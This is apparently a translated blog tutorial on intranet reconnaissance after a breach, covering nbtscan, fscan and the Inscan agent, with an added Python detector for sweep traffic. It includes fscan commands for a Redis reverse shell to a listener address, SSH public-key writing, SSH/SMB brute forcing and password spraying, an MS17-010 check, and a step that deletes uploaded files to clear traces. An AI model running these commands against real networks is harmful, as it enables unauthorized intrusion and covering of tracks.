Intranet detection (host survival, port, web assets)


Once we can reach any resource on the target intranet, we can collect deeper information about it: hosts, IP ranges, open ports and the services behind them, the number of web assets, and the vulnerability types present.

0x01. nbtscan

  1. Introduction:
    nbtscan is a small tool for scanning NetBIOS network information, released on November 23, 2005. It is tiny, simple and fast, but it only works on the local LAN; it displays the IP address, host name, logged-in user name and MAC address of each responding host.
  2. Command syntax (simple usage):
nbtscan-1.0.35.exe 192.168.0.1/24

0x02. Fscan

  1. Introduction:
    Fscan is a comprehensive intranet scanning tool for one-click, automated, all-round vulnerability scanning.
    It supports host liveness detection, port scanning, brute forcing of common services, MS17-010 checks, batch writing of public keys to Redis, Redis scheduled-task reverse shells, reading network card information, web fingerprinting, web vulnerability scanning, NetBIOS detection, domain controller identification and other functions.
  2. Download address: https://github.com/shadow1ng/fscan
    Command syntax (simple usage):
fscan.exe -h 192.168.1.1/24 (all modules are used by default)
fscan.exe -h 192.168.1.1/16 (class B range scan)

Other uses

fscan.exe -h 192.168.1.1/24 -np -no -nopoc (skip liveness detection, do not save a file, skip web PoC scanning)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (Redis: write a public key)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (Redis: scheduled-task reverse shell)
fscan.exe -h 192.168.1.1/24 -c whoami (run a command after a successful SSH brute force)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (specify the ssh module and a port)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (load user names and passwords from the given files for brute forcing)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (specify where to save the scan results; by default they are saved in the current directory)
fscan.exe -h 192.168.1.1/8 (class A range: scans 192.x.x.1 to 192.x.x.254, handy for a quick look at which segments are in use)
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (SMB password spraying with a single password)
fscan.exe -h 192.168.1.1/24 -m ms17010 (specify a single module)
  3. Practical test:
    For example, scan the class C range 192.168.0.x and save the results to 0.txt:
fscan.exe -h 192.168.0.0/24 -o 0.txt


You can see that the scan results identify the target host names, the live IPs, the open ports, the running web services, MS17-010 (EternalBlue) exposure, and so on.
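The defender's view of the sweep described above, as an added example that is not from the original post or from fscan: detection logic over constructed connection log lines that flags a source which, inside one time window, reaches many distinct hosts (liveness sweep) or several ports on several hosts (port sweep), which is what a default fscan run against a /24 looks like on the wire. The log format ("timestamp src dst dport" per line) and every address in it are constructed.

```python
"""Flag fscan-style host-liveness and port sweeps in connection logs.

Added example, not code from the original post or from fscan. Log format is
constructed: "<ISO timestamp> <src> <dst> <dport>" per line.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample traffic (not real): 192.168.0.77 sweeps the whole /24 on a
# handful of common ports within ~25 s; 192.168.0.10 is ordinary file-share use.
_t0 = datetime(2024, 5, 1, 10, 0, 0)
_lines = []
for _i in range(1, 255):
    for _port in (22, 80, 135, 139, 445, 3389):
        _ts = _t0 + timedelta(milliseconds=100 * _i)
        _lines.append(f"{_ts.isoformat()} 192.168.0.77 192.168.0.{_i} {_port}")
for _k in range(10):
    _ts = _t0 + timedelta(seconds=300 * _k)
    _lines.append(f"{_ts.isoformat()} 192.168.0.10 192.168.0.5 445")
SAMPLE_LOG = "\n".join(_lines)


def parse_log(text):
    """Yield (timestamp, src, dst, dport) tuples; blank lines are skipped."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        yield datetime.fromisoformat(ts), src, dst, int(dport)


def find_sweepers(events, window=timedelta(seconds=60), min_hosts=20, min_ports=4):
    """Return {src: (max_hosts, max_ports)} for sources that, within one window,
    hit >= min_hosts distinct hosts, or >= min_ports distinct ports on >= 3 hosts."""
    by_src = defaultdict(list)
    for ts, src, dst, dport in events:
        by_src[src].append((ts, dst, dport))
    hits = {}
    for src, evs in by_src.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):          # sliding window over sorted events
            while evs[end][0] - evs[start][0] > window:
                start += 1
            hosts = {d for _, d, _ in evs[start:end + 1]}
            ports = {p for _, _, p in evs[start:end + 1]}
            if len(hosts) >= min_hosts or (len(ports) >= min_ports and len(hosts) >= 3):
                hits[src] = max(hits.get(src, (0, 0)), (len(hosts), len(ports)))
    return hits


if __name__ == "__main__":
    for src, (hosts, ports) in find_sweepers(parse_log(SAMPLE_LOG)).items():
        print(f"possible sweep from {src}: {hosts} hosts, {ports} ports within 60 s")
```

The thresholds are deliberately loose; tune them to the segment's normal fan-out (backup servers and monitoring hosts will need an allow-list).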

0x03. Inscan

  1. Introduction:

Inscan is an automated intranet tool for the stage after the network boundary has been crossed. It is completely decoupled from its server, which is used only to generate the PoC, network segment and other configuration; the agent is a single binary for multiple platforms with no dependencies. It supports automatic visualization of multi-level tunnels and can traverse multi-layer networks via a background toggle; its scanner supports IPv6; it lets you quickly and intuitively see machines with multiple network cards, to locate hosts that can reach deeper network layers; it generates a social-engineering dictionary from known passwords to speed up intranet access; it automatically brute-forces intranet B/S (browser/server) systems, with automatic captcha recognition; it performs rapid asset identification and site screenshots; and it automatically scans the website directories of the discovered assets.

  1. Official website address: https://www.inbug.org/
    First register a user, then generate an Inscan Agent.

  2. After downloading, simply run it on the target terminal.

  3. After the scan completes, a poc.db file is generated in the current path.

  4. We can pull poc.db back to the local machine and import it into a database for viewing, or, on the next run, browse to the target IP on port 54088 to see the scan results.

  5. Use Navicat to import the db file and view it.

  6. Delete the uploaded files (for example, the 0.txt written by fscan):

del 0.txt

Source: blog.csdn.net/qq_42383069/article/details/123736558